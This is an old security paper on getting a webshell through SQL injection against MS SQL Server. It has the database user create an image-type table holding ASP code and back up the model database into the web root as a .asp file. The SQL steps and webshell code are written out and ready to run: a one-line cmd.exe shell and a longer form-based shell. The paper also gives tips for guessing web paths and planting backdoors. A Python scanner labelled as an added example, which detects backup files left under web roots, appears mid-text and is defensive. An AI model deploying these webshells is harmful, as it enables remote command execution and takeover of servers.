Posted Oct 24, 2004
Authored by Swan | Site 0x557.org

This is a small text document that describes how MS SQL can be "tricked" into creating a command.asp script under the webroot, even when you do not have access to 'sa' privs (dbo privs are probably still a must, though). The technique described uses the SQL server 'backup' command.

tags | paper, web, asp
SHA-256 | 00f4e7c9f7cd17235e6b6b60f335065c99183f5e4af191f5b7d9dfcb8975e8a2


[Backup a shell]
From : SST (www.0x557.org)
Author : Swan (Swan[at]0x557[dot]org)

This article is about how to get a webshell when SQL injecting against an MSSQL database. The method has seemed to work well since the day I found it (July 2003). You don't need the sa privilege; a dbowner is enough.
Open your Query Analyzer; the following steps will generate a strange but usable webshell (suppose your web root is g:\wwwtest and the model database is intact):

use model;
create table cmd (str image);
insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk='g:\wwwtest\l.asp';

Click run and the model database has been backed up into the web publishing directory. Download it? No, just visit this file in a browser: you have got the shell...

Here is the explanation. The ASP (VBScript) interpreter ignores any characters that are not between "<%" and "%>", so naming the backup file .asp and visiting it won't cause a 500 error as long as the file contains neither "<%" nor "%>". By default the database stores its data in a "loose" way (e.g. the stored string "Time" appears in the backup file as "T i m e"), so the probability that the backup file contains "<%" or "%>" by accident is low. These are the two preconditions.
But how could we make it a webshell? The storage mode of the image (binary) type is different: in the backup file that data appears in exactly the format we wrote it, that is, what we insert into the table with the image type is NOT written to the backup file in the "loose" way but in its original form. So once we create a table with an image column and insert some evil code, we can back up a shell!
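
Read from the defender's side, the two preconditions above also describe the artifact this technique leaves behind: a file under the web root that is really a SQL Server disk backup (mostly binary, with "loose" two-byte text) yet carries raw "<%...%>" segments from an image column. The following scanner is an added example, not part of the original text or of SST's tooling; it assumes that a SQL Server disk backup is written in Microsoft Tape Format, whose first bytes are the ASCII signature "TAPE", and it builds its own constructed web root so it runs offline.

```python
"""Flag files under a web root that look like SQL Server backups written with a
script extension.  Added example; assumptions are marked in comments."""
from __future__ import annotations

import re
import tempfile
from dataclasses import dataclass, field
from pathlib import Path

MTF_SIGNATURE = b"TAPE"            # assumption: first bytes of an MTF media header
SCRIPT_SUFFIXES = {".asp", ".aspx", ".ashx", ".asa"}  # extensions the web server executes
TEXT_BYTES = frozenset(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}
BINARY_RATIO = 0.30                # above this share of non-text bytes a script file is suspicious
ASP_TAG = re.compile(rb"<%(.*?)%>", re.DOTALL)


@dataclass
class Finding:
    path: str
    reasons: list[str] = field(default_factory=list)
    fragments: list[str] = field(default_factory=list)


def nonprintable_ratio(data: bytes) -> float:
    """Share of bytes outside printable ASCII plus tab/CR/LF."""
    if not data:
        return 0.0
    return sum(1 for b in data if b not in TEXT_BYTES) / len(data)


def asp_fragments(data: bytes, limit: int = 20) -> list[str]:
    """The server-side segments an ASP interpreter would execute, for triage."""
    return [m.group(1).decode("latin-1").strip() for m in ASP_TAG.finditer(data)][:limit]


def script_reasons(data: bytes) -> list[str]:
    """Reasons that apply only to files the web server would execute."""
    reasons = []
    ratio = nonprintable_ratio(data)
    if ratio > BINARY_RATIO:
        reasons.append(f"binary-content-{ratio:.0%}")
        if ASP_TAG.search(data):
            reasons.append("asp-tags-inside-binary")   # raw image-column bytes inside a backup
    return reasons


def scan_webroot(root: str) -> list[Finding]:
    base = Path(root)
    findings = []
    for path in sorted(p for p in base.rglob("*") if p.is_file()):
        data = path.read_bytes()
        reasons = []
        if data[:4] == MTF_SIGNATURE:
            reasons.append("sql-server-backup-header")  # a backup never belongs under a web root
        if path.suffix.lower() in SCRIPT_SUFFIXES:
            reasons.extend(script_reasons(data))
        if reasons:
            findings.append(Finding(str(path.relative_to(base)), reasons, asp_fragments(data)))
    return findings


def build_sample_webroot() -> str:
    """Constructed web root: one normal page, one backup-shaped .asp, one backup-shaped .txt."""
    root = tempfile.mkdtemp(prefix="webroot-")
    (Path(root) / "default.asp").write_text('<% Response.Write("hello") %>\n<html></html>\n')
    filler = bytes(range(256)) * 8                      # deterministic "binary" padding
    fake_backup = (MTF_SIGNATURE + filler
                   + "Time".encode("utf-16-le")          # the "loose" T.i.m.e storage
                   + filler
                   + b'<% Response.Write("injected") %>'  # constructed marker, not a payload
                   + filler)
    (Path(root) / "l.asp").write_bytes(fake_backup)
    (Path(root) / "readme.txt").write_bytes(fake_backup)  # not executable, but still a leaked backup
    return root


if __name__ == "__main__":
    for finding in scan_webroot(build_sample_webroot()):
        print(finding.path, finding.reasons, finding.fragments)
```

The header check catches a backup under the web root regardless of its name (data disclosure on its own), while the binary-plus-tags check is restricted to executable extensions, which is the shape of the file the article produces. Run on a real web root, pair it with a SQL Server audit of who holds BACKUP DATABASE rights, since the article's point is that db_owner already suffices.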

Er, there are also some cons:

1) The output directory must be the physical web directory. Usually we can only guess it. For a virtual host, perhaps the path can be revealed through other sites on the same server or by other means.
2) The database user must have the backup privilege. Some unusual webmasters grant only select and insert privileges; if you meet such a webmaster, abandon this method.

Here are the pros:
1) It gives you a webshell once you have the backup privilege. A dbowner has that!
2) It gives a new method of planting a backdoor. Suppose your database is Access and you have named it .asp to prevent it from being downloaded. It COULD be a webshell ;)
3) ...

Oh, I nearly forgot the most important thing: data from different insert statements are NOT contiguous in the backup file, which means that if your webshell code is too long you should do it as follows:

========= CUT ME HERE ======================================================
use model
create table cmd (str image);
insert into cmd(str) values ('<% Dim oScript %>');
insert into cmd(str) values ('<% Dim oScriptNet%>');
insert into cmd(str) values ('<% Dim oFileSys, oFile%>');
insert into cmd(str) values ('<% Dim szCMD, szTempFile%>');
insert into cmd(str) values ('<% Set oScript = Server.CreateObject("WSCRIPT.SHELL")%>');
insert into cmd(str) values ('<% Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")%>');
insert into cmd(str) values ('<% Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")%>');
insert into cmd(str) values ('<% szCMD = Request.Form(".CMD")%>');
insert into cmd(str) values ('<% If (szCMD <> "") Then%>');
insert into cmd(str) values ('<% szTempFile = "C:\" & oFileSys.GetTempName()%>');
insert into cmd(str) values ('<% Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)%>');
insert into cmd(str) values ('<% Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)%>');
insert into cmd(str) values ('<% End If %>');
insert into cmd(str) values ('<HTML><BODY><FORM action="<%= Request.ServerVariables("URL") %>" method="POST">');
insert into cmd(str) values ('<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run"></FORM><PRE>');
insert into cmd(str) values ('<% If (IsObject(oFile)) Then%>');
insert into cmd(str) values ('<% On Error Resume Next%>');
insert into cmd(str) values ('<% Response.Write Server.HTMLEncode(oFile.ReadAll)%>');
insert into cmd(str) values ('<% oFile.Close%>');
insert into cmd(str) values ('<% Call oFileSys.DeleteFile(szTempFile, True)%>');
insert into cmd(str) values ('<% End If%>');
insert into cmd(str) values ('</BODY></HTML>');
backup database model to disk='c:\l.asp';
========= CUT ME HERE ======================================================

To those who did not successfully get the shell:
Make sure your testing database (e.g. model) is INTACT.

To those who surf on the web:
declare @a sysname; select @a=db_name()

To those who think it is too simple:
Try the same with backup log, or think about how to access any file in a similar way ;)

All SST Members.
Yang Shuo, my girlfriend.